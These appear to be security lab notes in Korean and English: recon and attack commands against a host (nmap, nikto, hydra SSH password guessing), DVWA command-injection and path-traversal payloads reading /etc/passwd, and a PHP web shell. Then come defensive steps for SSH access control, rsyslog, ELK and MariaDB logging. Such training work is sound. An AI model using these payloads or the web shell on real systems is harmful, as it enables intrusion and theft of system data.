공격
# Reconnaissance and login-guessing steps run against the host st.kr.
# Each step notes what the command does and where it tends to show up on the
# target side, so the logging set up later in these notes can be checked.
# ICMP echo: basic reachability check.
ping st.kr
# DNS lookup of the host name.
nslookup st.kr
# Hop-by-hop network path to the host.
traceroute st.kr
# -sS: TCP SYN (half-open) scan, -O: OS fingerprinting, -v: verbose output.
# Typically visible to a firewall/IDS as SYNs to many ports from one source.
nmap -v -sS -O st.kr
# DNS enumeration for the st.kr domain.
dnsenum st.kr
# Web server scan of the host given with -h; typically leaves a large number
# of requests in the web server access log.
nikto -h st.kr
# Password guessing against the SSH service: login names are read from
# user.txt (-L) and passwords from passwd.txt (-P).
# Typically appears as repeated failed logins in the sshd authentication log.
hydra -L user.txt -P passwd.txt st.kr ssh
시스템 사용자를 찾아라
kali > ssh 125.246.95.152
dvwa
command injection
; cat /etc/passwd
file inclusion ?page=../../../../../etc/passwd
file upload
hackable/uploads/attack.php
?php
$cmd = $_GET['cmd'];
$result = system($cmd);
echo "
";
echo "
";
echo $result;
?
hackable/uploads/attack.php?cmd=cat /etc/passwd
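서버 관리자만 접근가능하게 (ssh접근 차단) — hosts.allow/hosts.deny는 sshd가 TCP Wrappers(libwrap) 지원으로 빌드된 경우에만 적용되므로, 설정 후 허용되지 않은 IP에서 접속이 실제로 거부되는지 확인한다.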
/etc/hosts.allow sshd : 192.168.0.3
/etc/hosts.deny ALL : ALL
ssh 포트 번호를 변경하기 (포트 변경은 자동 스캔을 줄일 뿐 접근 통제가 아니므로 위의 접근 제한과 함께 쓴다)
/etc/ssh/sshd_config
/etc/rsyslog.conf
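# provides TCP syslog reception
module(load="imtcp")
input(type="imtcp" port="514")
# Restrict which senders may submit logs over TCP. In the legacy
# $AllowedSender syntax the entries after the protocol are comma-separated.
# NOTE(review): *.st.kr is matched by host name, so it depends on reverse DNS
# being trustworthy; prefer IP addresses or ranges where possible.
# NOTE(review): plain TCP on 514 is neither authenticated nor encrypted. Also
# limit the port at the firewall, and confirm from a non-listed host that the
# sender list is really enforced together with the input() statement above.
$AllowedSender TCP, 127.0.0.1, 10.0.2.0/24, *.st.kr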
서버
/etc/rsyslog.d/50-default.conf
Target="10.0.2.3"
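# Install the Java runtime, the JDK and nginx from the distribution repositories.
sudo apt -y install default-jre
sudo apt -y install default-jdk
sudo apt -y install nginx
# Fetch Elastic's package signing key and store it as a dedicated keyring, so
# it is trusted only for the Elastic repository (see signed-by= below).
# -f makes curl fail on an HTTP error instead of piping an error page to gpg.
curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic.gpg
# Write (rather than append) the repository entry, so that running these steps
# again does not leave duplicate lines in the list file.
echo "deb [signed-by=/usr/share/keyrings/elastic.gpg] https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee /etc/apt/sources.list.d/elastic-7.x.list
# Refresh the package index so the new repository is visible, then install.
sudo apt update
sudo apt -y install elasticsearch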
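/etc/elasticsearch/elasticsearch.yml 수정 (7.x는 인증이 기본으로 꺼져 있으므로, network.host를 localhost 밖으로 열기 전에 xpack.security.enabled: true 로 인증을 켠다)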
# Elasticsearch: start it now and register it to start at boot.
sudo systemctl enable --now elasticsearch
# Ask the local HTTP endpoint for its banner to confirm the node answers.
curl --request GET 'localhost:9200'
# Kibana: install, then start it and register it to start at boot.
sudo apt install --yes kibana
sudo systemctl enable --now kibana
# Logstash is only installed here; it is not started by these steps.
sudo apt install --yes logstash
select FromHost,Message from SystemEvents limit 0, 10;
mysql 외부 접근 허용하기
mysql
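-- Account used from the host 192.168.0.3 to reach the Syslog database.
-- The password below is a placeholder: replace it with a long, randomly
-- generated value instead of a guessable one, and keep it out of notes.
CREATE USER 'rsyslog'@'192.168.0.3' IDENTIFIED BY '<STRONG_UNIQUE_PASSWORD>';
-- NOTE(review): ALL is broader than a log writer normally needs; presumably
-- INSERT (plus SELECT for viewing) is enough. Confirm and narrow the grant.
GRANT ALL ON Syslog.* TO 'rsyslog'@'192.168.0.3';
FLUSH PRIVILEGES;
-- The same account name opened to every source address ('%').
-- NOTE(review): with this account present, the restriction to 192.168.0.3
-- above no longer limits who may log in as rsyslog; any host that can reach
-- the database port can attempt a login. Keep it only if that is required.
CREATE USER 'rsyslog'@'%' IDENTIFIED BY '<STRONG_UNIQUE_PASSWORD>';
GRANT ALL ON Syslog.* TO 'rsyslog'@'%';
FLUSH PRIVILEGES;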
/etc/mysql/mariadb.conf.d/50-server.cnf 수정 (0.0.0.0은 모든 인터페이스에서 DB 포트를 수신하므로, 방화벽으로 rsyslog 클라이언트 IP만 허용하거나 내부망 주소에만 바인딩한다)
bind-address = 0.0.0.0